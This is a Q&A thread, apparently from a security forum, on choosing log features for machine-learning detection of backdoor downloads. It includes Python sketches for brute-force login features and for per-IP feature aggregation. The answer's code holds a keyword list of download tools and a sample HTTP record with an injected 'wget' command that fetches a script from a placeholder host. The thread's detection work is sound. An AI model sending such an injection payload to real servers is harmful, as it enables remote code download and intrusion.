
I was reading a document about logging and analysis. It discusses statistical analysis and machine learning techniques for detecting certain attack scenarios. For instance, if you want to detect a possible brute-force login, you might look at the following features:

  • Firewall Accepts, Multiple Failed Logins in a Row, At Least 1 Successful Login.
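As a rough illustration of how those three features could be computed for one source IP, here is a minimal sketch. The `Event` record, its `source` and `action` labels, and the function name are all hypothetical; real firewall and authentication logs would need their own parsing first.

```python
from dataclasses import dataclass


@dataclass
class Event:
    # Hypothetical, already-parsed log record (not a real log format).
    src_ip: str
    source: str  # "firewall" or "auth"
    action: str  # "accept", "fail" or "success"


def brute_force_features(events):
    """Compute the three features for a time-ordered list of events
    that all belong to the same source IP."""
    firewall_accepts = 0
    successful_logins = 0
    max_failed_in_row = 0
    current_run = 0  # length of the current streak of failed logins

    for e in events:
        if e.source == "firewall" and e.action == "accept":
            firewall_accepts += 1
        elif e.source == "auth" and e.action == "fail":
            current_run += 1
            max_failed_in_row = max(max_failed_in_row, current_run)
        elif e.source == "auth" and e.action == "success":
            successful_logins += 1
            current_run = 0  # a success ends the failure streak

    return {
        "firewall_accepts": firewall_accepts,
        "max_failed_in_row": max_failed_in_row,
        "successful_logins": successful_logins,
    }


# Made-up events for a single documentation-range IP address.
sample = [
    Event("192.0.2.10", "firewall", "accept"),
    Event("192.0.2.10", "auth", "fail"),
    Event("192.0.2.10", "auth", "fail"),
    Event("192.0.2.10", "auth", "fail"),
    Event("192.0.2.10", "auth", "success"),
]
features = brute_force_features(sample)
```

The resulting dictionary is one row of a feature table; any threshold on it (for example, how many failures in a row count as suspicious) would have to be chosen from the data.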

What interests me is that these features are collected from different sources (firewall, source machine). I have a use case where I want to detect attacks that try to download and install backdoors. I have logs collected from an IDS, a firewall, an HTTP server and a syslog server. I want to find some indicative features that I can feed to my machine learning model. My problem is shown in the picture below:

enter image description here

A fellow researcher manually analyzed the logs and provided some useful insights, but he only used one source machine (the HTTP server), specifically the data field in its logs.

Does this mean that backdoors are hard for security devices to detect? If I want to use other features, as in the brute-force example, to detect backdoors in an automated manner, what would you propose?

PS: I only want some general ideas about these features. I know that backdoor detection can be hard. Fortunately, I only have to study the backdoor in the dataset I have x).

Bests.

U. User

1 Answer


In general, security systems that use a machine learning approach are based on features, metrics or characteristics. These differ depending on the area (anti-virus, anti-spam, NIDS). For example, in the area of spam, the subject is a key characteristic, as is whether the message has an attachment and whether that attachment could contain another file (zip, tar files). In the area of anti-virus, on the other hand, some of the characteristics could be the file type, specific strings inside the binary, the syscalls used and so on. And as you can guess, for a NIDS the features could be completely different: packets up, TCP push, HTTP messages, URI content, and so on.

In general, articles of that type depend heavily on the dataset used, so it is easy for the authors to fiddle with the results a bit. Bear in mind that when these systems produce false positives, the authors need to find further characteristics that distinguish the false positives from real attacks, and this is sometimes hard to do.

In the case of backdoors, you need to study the characteristics and behavior of some of them and create your own features. Network traffic features combined with the usual malware characteristics would probably be a good starting point.
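To make the idea of combining sources concrete, here is a minimal sketch that builds one feature row per source IP from already-parsed records. Everything in it is an assumption for illustration: the record layout (`source`, `src_ip`, `message`), the feature names, and especially the `SUSPICIOUS_TOKENS` list, which is a placeholder and not a vetted set of indicators.

```python
from collections import defaultdict

# Placeholder tokens that might hint at a download attempt in an HTTP
# message field. Illustrative only; derive the real list from your dataset.
SUSPICIOUS_TOKENS = ("wget", "curl", "chmod")

# Maps a (hypothetical) log source label to the counter it increments.
SOURCE_COUNTERS = {
    "ids": "ids_alerts",
    "firewall": "firewall_events",
    "http": "http_requests",
    "syslog": "syslog_events",
}


def empty_row():
    row = {name: 0 for name in SOURCE_COUNTERS.values()}
    row["suspicious_http_messages"] = 0
    return row


def build_feature_vectors(records):
    """Aggregate per-source counts and one content-based feature per src_ip."""
    vectors = defaultdict(empty_row)
    for rec in records:
        row = vectors[rec["src_ip"]]
        counter = SOURCE_COUNTERS.get(rec["source"])
        if counter is not None:
            row[counter] += 1
        if rec["source"] == "http":
            message = rec.get("message", "").lower()
            if any(token in message for token in SUSPICIOUS_TOKENS):
                row["suspicious_http_messages"] += 1
    return dict(vectors)


# Made-up records using documentation-range addresses.
records = [
    {"source": "firewall", "src_ip": "192.0.2.10", "message": "ACCEPT tcp dport=80"},
    {"source": "http", "src_ip": "192.0.2.10",
     "message": "GET /index.php?cmd=wget+http://example.invalid/b.sh"},
    {"source": "ids", "src_ip": "192.0.2.10", "message": "alert"},
    {"source": "http", "src_ip": "192.0.2.20", "message": "GET /index.html"},
]
vectors = build_feature_vectors(records)
```

Each row mixes network-level counts with a content-based feature from the HTTP message field, so a model can use both instead of relying on a single log source.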

camp0
  • Yeah, but according to the picture, the authors only use the web server logs, and only the data (or message) field in those logs, to conclude that the attack tried to download and install the backdoor. So I am a little confused about the next step: should I try to come up with a machine learning/data mining approach that studies only the message field in the logs, or should I combine it with other features like the ones you've suggested (IP addresses, network traffic features, etc.)? – U. User Feb 23 '19 at 12:14